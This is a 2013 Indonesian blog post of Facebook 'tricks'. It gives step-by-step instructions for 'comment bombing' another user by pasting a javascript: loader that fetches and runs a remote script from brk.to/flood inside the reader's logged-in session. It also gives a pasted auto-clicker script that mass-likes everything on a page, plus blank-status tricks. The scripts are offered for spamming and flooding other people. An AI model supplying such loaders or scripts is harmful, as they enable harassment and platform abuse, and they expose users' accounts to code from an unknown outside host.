Pages

Monday, April 29, 2013

Rahasia Facebook

 
Inilah Trik Rahasia Facebook Terbaru - Sudah tidak diragukan lagi, facebook merupakan media sosial yang paling laris dan terkenal di dunia. Banyak sekali orang-orang yang memanfaatkan facebook untuk sekedar hiburan akan tetapi ada juga yang menggunaknnya untuk berbagai macam usaha atau bisnis. Tapi apa kalian tahu, ternyata ada beberapa rahasia di dalam facebook yang mungkin kalian belum tahu. Diantaranya, Bom Komentar, Bom Jempol/Like/Suka, dan status kosong. Kok bisa? Ya tentu saja bisa. Yang mau tahu caranya seperti apa, silahkan lihat langsung di bawah ini:

Bom Komentar Facebook

1. Buka Profil atau Halaman Facebook yang ingin anda kirimkan bom komentar.

2. Copy dan paste-kan code dibawah ini ke ADDRESS BAR lalu tekan tombol ENTER
javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0)

3. Akan muncul sebuah jendela, Masukkan Jumlah Pesan Yang Akan Dikirim, ENTER.

4. Kemudian Masukkan Komentar Anda, ENTER.

5. Tunggu sesaat dan jangan tutup profil teman Facebook anda.

6. Selamat nge-bom !!
Bom Jempol / Like / Suka di Facebook
1. Buka Profil atau Halaman Facebook yang ingin anda kirimkan bom Jempol / Like / Suka.

2. Copy dan paste-kan code dibawah ini ke ADDRESS BAR lalu tekan tombol ENTER
javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute("class");if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol[j].getAttribute("name") == "like")jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons[x].getAttribute("title") == "Like this comment")buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert(' Jose Rizal University ');updateTime();window.setInterval(updateTime, 1000);void(0)

3. Jangan tutup halaman yang anda bom, biarkan code di atas meng-expand status yg ada pada halaman tersebut.

Membuat Status Dan Komentar Kosong Di Facebook
Untuk STATUS KOSONG langsung saja ketik dibawah ini pada "What's on your mind ? / Apa yang Anda pikirkan ?" di tempat biasa kalau kamu mau menulis status
@[2:2:TEKAN_SPASI]

Contoh :
@[2:2: ]

*) Catatan:
Untuk KOMENTAR KOSONG melalui http://m.facebook.comTekan ALT trus tahan... dalam keadaan ALT di Tekan/Tahan.. lanjutkan dengan menekan tombol 0173.. setelah itu.. Lepas ALT... lalu ENTER..
( coba di PC, klo pake laptop tekan Fn+NumLk dulu )

NB: Hati-hati kalau terlalu banyak fb kalian akan diblockir pihak facebook.

Selamat Mencoba dan Semoga Bermanfaat ^^

0 komentar:

Post a Comment